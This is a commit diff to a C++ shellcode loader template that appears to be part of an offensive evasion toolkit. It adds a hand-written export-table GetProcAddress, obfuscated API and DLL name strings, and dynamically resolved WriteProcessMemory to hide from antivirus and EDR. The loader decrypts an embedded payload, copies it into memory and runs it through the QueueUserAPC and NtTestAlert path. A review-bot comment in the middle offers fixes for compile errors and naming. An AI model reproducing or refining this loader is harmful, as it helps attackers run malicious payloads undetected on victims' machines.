
Update template.cpp

Evasion additions
assume-breach 2 ani în urmă
părinte
comite
ffcc66e5ea
1 a modificat fișierele cu 60 adăugiri și 9 ștergeri
  1. 60 9
      Harriet/Harriet/QueueUserAPC/template.cpp

+ 60 - 9
Harriet/Harriet/QueueUserAPC/template.cpp

@@ -9,13 +9,47 @@
 #pragma comment (lib, "advapi32")
 #pragma comment(lib, "ntdll")
 
-using Random6 = NTSTATUS(NTAPI*)();
+// Custom GetProcAddress function
+typedef FARPROC(__stdcall* ARPROC)(HMODULE, LPCSTR);
+
+FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
+    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
+    PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule +
+        ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+    DWORD* addressOfFunctions = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfFunctions);
+    WORD* addressOfNameOrdinals = (WORD*)((BYTE*)hModule + exportDirectory->AddressOfNameOrdinals);
+    DWORD* addressOfNames = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfNames);
+
+    for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
+        if (strcmp(lpProcName, (const char*)hModule + addressOfNames[i]) == 0) {
+            return (FARPROC)((BYTE*)hModule + addressOfFunctions[addressOfNameOrdinals[i]]);
+        }
+    }
+
+    return NULL;
+}
 
-static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+typedef BOOL(WINAPI* WriteProcessMemoryPtr)(
+    HANDLE hProcess,
+    LPVOID lpBaseAddress,
+    LPCVOID lpBuffer,
+    SIZE_T nSize,
+    SIZE_T* lpNumberOfBytesWritten
+);
 
-static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+unsigned char HvqNFK[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
+unsigned char sQKsNqz[] = { 'N', 't', 'D', 'e', 'l', 'a', 'y', 'E', 'x', 'e', 'c', 'u', 't', 'i', 'o', 'n', 0x0 };
+unsigned char UHVQNq[] = { 'Z', 'w', 'S', 'e', 't', 'T', 'i', 'm', 'e', 'r', 'R', 'e', 's', 'o', 'l', 'u', 't', 'i', 'o', 'n', 0x0 };
 
-static void SleepShort(float milliseconds) {
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))myGetProcAddress(GetModuleHandle(HvqNFK), sQKsNqz);
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))myGetProcAddress(GetModuleHandle(HvqNFK), UHVQNq);
+
+static void Random4(float milliseconds) {
     static bool once = true;
     if (once) {
         ULONG actualResolution;
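Review bot: The new `unsigned char` name arrays are passed where `LPCSTR` is expected without a cast — `GetModuleHandle(HvqNFK)` and the `sQKsNqz`/`UHVQNq` arguments to `myGetProcAddress` in the two static initializers here — while the third hunk casts only the second argument in `GetModuleHandleA(HvqNFK), (LPCSTR)sNtA`. In C++ an `unsigned char*` does not convert implicitly to `const char*`, so unless this file is built with a permissive setting these initializers will not compile; apply the same `(LPCSTR)` cast to every array argument, or declare the three arrays as `char` so no cast is needed at any call site. Separately, `SleepShort` is renamed to `Random4` here, but the last hunk replaces its only visible call with `Sleep(3000)` and `main` already declares a local `SIZE_T Random4`, so the renamed function appears unused and is shadowed inside `main`; if it is meant to stay, give it a name that does not collide. `myGetProcAddress` carries no contract beyond the one-line heading; a short comment stating that it walks the module's export-name table and returns `NULL` when no name matches would help readers.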
@@ -27,8 +61,10 @@ static void SleepShort(float milliseconds) {
     interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
     NtDelayExecution(false, &interval);
 }
-unsigned char sntdll[] = {'n','t','d','l','l', 0x0};
-unsigned char sNtA[] = {'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
+
+using Random6 = NTSTATUS(NTAPI*)();
+
+unsigned char sNtA[] = { 'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
 
 int DecryptData(char* Random3, unsigned int Random3_len, char* Random2, int Random2len) {
     HCRYPTPROV hProv;
@@ -69,7 +105,7 @@ int main() {
 
     FreeConsole();
 
-    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(sntdll), sNtA));
+    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(HvqNFK), (LPCSTR)sNtA));
 
     SIZE_T Random4 = sizeof(Random3);
 
@@ -80,9 +116,24 @@ int main() {
 
     LPVOID Random5 = VirtualAlloc(NULL, Random4, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 
-    SleepShort(3000);
+    Sleep(3000); // Corrected Sleep function name
+
+    WriteProcessMemoryPtr pWriteProcessMemory =
+reinterpret_cast<WriteProcessMemoryPtr>(myGetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
 
-    WriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, NULL);
+
+if (pWriteProcessMemory != nullptr) {
+    // Using native API WriteProcessMemory
+    if (pWriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, nullptr)) {
+        
+    }
+    else {
+        
+    }
+}
+else {
+   
+}
 
     RtlCopyMemory(Random5, Random3, Random3_len);